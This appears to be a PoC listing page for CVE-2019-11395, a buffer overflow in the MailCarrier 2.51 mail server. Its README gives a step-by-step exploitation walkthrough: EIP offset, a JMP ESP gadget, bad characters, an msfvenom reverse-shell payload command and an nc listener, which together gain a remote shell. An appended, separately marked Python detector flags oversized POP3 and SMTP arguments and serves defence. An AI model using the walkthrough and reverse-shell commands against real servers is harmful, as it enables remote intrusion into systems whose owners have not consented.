
CVE-2019-11395 PoC — Taps Lab MailCarrier Buffer Error Vulnerability

Source
Associated Vulnerability
Title: Taps Lab MailCarrier Buffer Error Vulnerability (CVE-2019-11395)
Description: Taps Lab MailCarrier is a mail server for the Windows Server platform made by the Korean company Taps Lab. The product supports SMTP, POP3, IMAP and other protocols. Taps Lab MailCarrier 2.51 contains a buffer overflow vulnerability. The flaw arises because the product does not correctly validate data boundaries when operating on memory, so reads or writes are performed on other, adjacent memory locations. An attacker can exploit this to cause a buffer overflow or heap overflow.
Description
An exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.
Readme
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
</head>

<body>
  <h1 align="center">CVE-2019-11395 Exploit 🛡️</h1>

  <h2>About CVE-2019-11395 🕵️</h2>

  <p>The CVE-2019-11395 vulnerability describes a buffer overflow vulnerability in the MailCarrier 2.51 email application, allowing remote code execution. The vulnerability occurs in SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR processes.</p>

  <p>During academic study, focus was placed on the POP3 processes to create a Proof of Concept (PoC). It was identified that sending 6000 bytes to the application causes the service to crash, which confirmed the buffer overflow vulnerability.</p>

  <h2>Exploitation Steps 🔍</h2>

  <ol>
    <li>Utilized <code>msf-pattern_create -l 6000</code> to accurately identify the EIP.</li>
    <li>Identified the EIP offset with <code>msf-pattern_offset -q 6E47386E -l 6000</code>, resulting in an EIP offset of 5095.</li>
    <li>Identified <code>expsrv.dll</code> with ASLR disabled, suitable for a JMP ESP.</li>
    <li>Identified bad characters <code>\x00\x0a\x0d</code> during tests for invalid characters.</li>
    <li>Generated payload with <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
    <li>Adjusted the <code>CVE-2019-11395.py</code> code to accommodate the payload.</li>
    <li>Opened connection with <code>nc -lnvp 4444</code> and executed the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
  </ol>

  <h2>Usage 🚀</h2>

  <p>Follow these steps to utilize the exploit:</p>

  <ol>
    <li>Generate the payload using <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
    <li>Copy the output of the <code>msfvenom</code> command.</li>
    <li>Adjust the <code>CVE-2019-11395.py</code> code to replace the <code>shellcode</code> variable with the output obtained from the <code>msfvenom</code> command.</li>
    <li>Execute the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
  </ol>

  <h2>Compromised Environment 📸</h2>
  
  <img src="https://github.com/caioprince/CVE-2019-11395/blob/main/CVE-2019-11395.png" alt="PoC CVE-2019-11395" width="500">

  <section>
    <h2>🔗 Connect with me</h2>
    <p>Visit my profile on <a href="https://www.linkedin.com/in/caio-paiva-cyber-security/" target="_blank">LinkedIn</a></p>
  </section>
</body>

</html>
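A defender-side check for the oversized command arguments the README describes, added here as an example; it is not part of the caioprince PoC repository or of MailCarrier. It scans client-to-server lines of a POP3 or SMTP session and flags arguments that exceed the protocol limits (RFC 1939 allows POP3 arguments of at most 40 characters, RFC 5321 allows paths of at most 256 octets), with a separate severity for arguments large enough to match the 6000-byte crash the README reports. The 1024-byte overflow threshold and the sample session lines are constructed assumptions, not values from the page.

```python
"""Flag oversized POP3 / SMTP command arguments of the kind that trigger
CVE-2019-11395 in MailCarrier 2.51.  Added detection example, not part of
the PoC repository.  The sample session below is constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional

# RFC 1939 (POP3): each argument may be at most 40 characters.
# RFC 5321 (SMTP): a reverse-path / forward-path is limited to 256 octets.
POP3_ARG_MAX = 40
SMTP_PATH_MAX = 256
# Assumed threshold: no legitimate client sends arguments this large; the
# README reports a crash at 6000 bytes, so treat >= 1024 as an overflow attempt.
OVERFLOW_HINT = 1024

# Commands the advisory names as overflow sinks.
POP3_CMDS = {"USER", "LIST", "TOP", "RETR"}
SMTP_RCPT = re.compile(rb"^RCPT\s+TO:\s*(.*)$", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    command: str
    arg_len: int
    severity: str  # "policy" (over the RFC limit) or "overflow" (far over it)


def _severity(arg_len: int, limit: int) -> Optional[str]:
    """Classify an argument length against the protocol limit."""
    if arg_len >= OVERFLOW_HINT:
        return "overflow"
    if arg_len > limit:
        return "policy"
    return None


def scan_session(lines: List[bytes]) -> List[Finding]:
    """Inspect client->server lines (bytes; trailing CRLF is optional)."""
    findings: List[Finding] = []
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip(b"\r\n")
        m = SMTP_RCPT.match(line)
        if m:
            path_len = len(m.group(1))
            sev = _severity(path_len, SMTP_PATH_MAX)
            if sev:
                findings.append(Finding(no, "RCPT TO", path_len, sev))
            continue
        parts = line.split(None, 1)
        if not parts:
            continue
        cmd = parts[0].upper().decode("ascii", "replace")
        if cmd in POP3_CMDS and len(parts) == 2:
            # LIST/TOP/RETR take one or two arguments; check the longest token.
            longest = max(len(tok) for tok in parts[1].split())
            sev = _severity(longest, POP3_ARG_MAX)
            if sev:
                findings.append(Finding(no, cmd, longest, sev))
    return findings


# Constructed sample session: three benign lines, then three anomalies.
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"PASS hunter2\r\n",
    b"LIST\r\n",
    b"RETR 1\r\n",
    b"USER " + b"A" * 80 + b"\r\n",                      # over RFC limit only
    b"TOP " + b"A" * 6000 + b" 10\r\n",                  # the 6000-byte crash case
    b"RCPT TO:<" + b"B" * 300 + b"@example.invalid>\r\n",  # 318-octet path
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.command} arg of {f.arg_len} bytes -> {f.severity}")
```

Run over a pcap-derived or proxy-logged session, a "policy" finding is a client misbehaving, while an "overflow" finding on USER, LIST, TOP, RETR or RCPT TO against an unpatched MailCarrier 2.51 host is the signature of this CVE and should trigger an alert and a service-health check.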
File Snapshot

[4.0K] /data/pocs/9cd98983bf6dc86610a72d600dee1b2b2f338bf7
├── [ 29K] CVE-2019-11395.png
├── [2.5K] CVE-2019-11395.py
└── [2.6K] README.md

0 directories, 3 files